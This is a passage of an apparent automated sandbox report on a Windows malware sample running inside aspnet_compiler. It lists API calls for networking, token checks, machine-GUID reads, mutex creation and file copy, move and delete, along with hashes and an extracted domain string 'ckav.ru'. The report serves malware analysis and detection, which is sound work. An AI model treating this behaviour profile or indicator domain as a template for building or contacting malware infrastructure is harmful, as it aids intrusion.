                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                                                                      • _wmemset.LIBCMT ref: 00406244
                                                                                                                      • _wmemset.LIBCMT ref: 00406261
                                                                                                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _wmemset$ErrorInformationLastToken
                                                                                                                      • String ID: IDA$IDA
                                                                                                                      • API String ID: 487585393-2020647798
                                                                                                                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                                                                                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                                                                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                                                                                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                                                                                                                      APIs
                                                                                                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: freeaddrinfogetaddrinfosocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2479546573-0
                                                                                                                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                                                                                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                                                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                                                                                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AllocCreateReadVirtual
                                                                                                                      • String ID: .tmp
                                                                                                                      • API String ID: 3585551309-2986845003
                                                                                                                      • Opcode ID: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
                                                                                                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                                                      • Opcode Fuzzy Hash: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
                                                                                                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                                                      • GetLastError.KERNEL32 ref: 0041399E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$CreateLastModeMutex
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3448925889-0
                                                                                                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CreatePointerWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3672724799-0
                                                                                                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                                                      • String ID: ckav.ru
                                                                                                                      • API String ID: 2915393847-2696028687
                                                                                                                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                                                                                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                                                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                                                                                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                      • _wmemset.LIBCMT ref: 0040634F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcess_wmemset
                                                                                                                      • String ID: CA
                                                                                                                      • API String ID: 2773065342-1052703068
                                                                                                                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                                                                                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                                                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                                                                                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationToken
                                                                                                                      • String ID: IDA
                                                                                                                      • API String ID: 4114910276-365204570
                                                                                                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                                                      APIs
                                                                                                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc
                                                                                                                      • String ID: s1@
                                                                                                                      • API String ID: 190572456-427247929
                                                                                                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1425999871-0
                                                                                                                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                                                                                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                                                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                                                                                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                                                                                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                                                                                                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                                                                                                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                                                                                                      APIs
                                                                                                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CheckMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1351025785-0
                                                                                                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4241100979-0
                                                                                                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                                                      APIs
                                                                                                                      • CopyFileW.KERNELBASE(00000000,00000000,004041B3,00000000,F25E823B,00000000,00000000,?,004041B3,00000000,00000000,00000000), ref: 00403C3C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1304948518-0
                                                                                                                      • Opcode ID: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                                                                                      • Instruction ID: 708ff4401ac3282b12d7668d94bc51921ab55dbb6f1a62cfe087fe8b706b923f
                                                                                                                      • Opcode Fuzzy Hash: 5c28da5d626f681fb06662006ab0c2c95d6c94e8822ad681e7d12da421b0949b
                                                                                                                      • Instruction Fuzzy Hash: 57D0127200860CBFEF016EE59C05C7B3F5EEB04255B008825BD18E5021DA37DE2076E5
                                                                                                                      APIs
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoNativeSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1721193555-0
                                                                                                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                                                      APIs
                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: send
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2809346765-0
                                                                                                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                                                      APIs
                                                                                                                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileMove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3562171763-0
                                                                                                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Startup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 724789610-0
                                                                                                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                                                      APIs
                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 71445658-0
                                                                                                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                                                      APIs
                                                                                                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
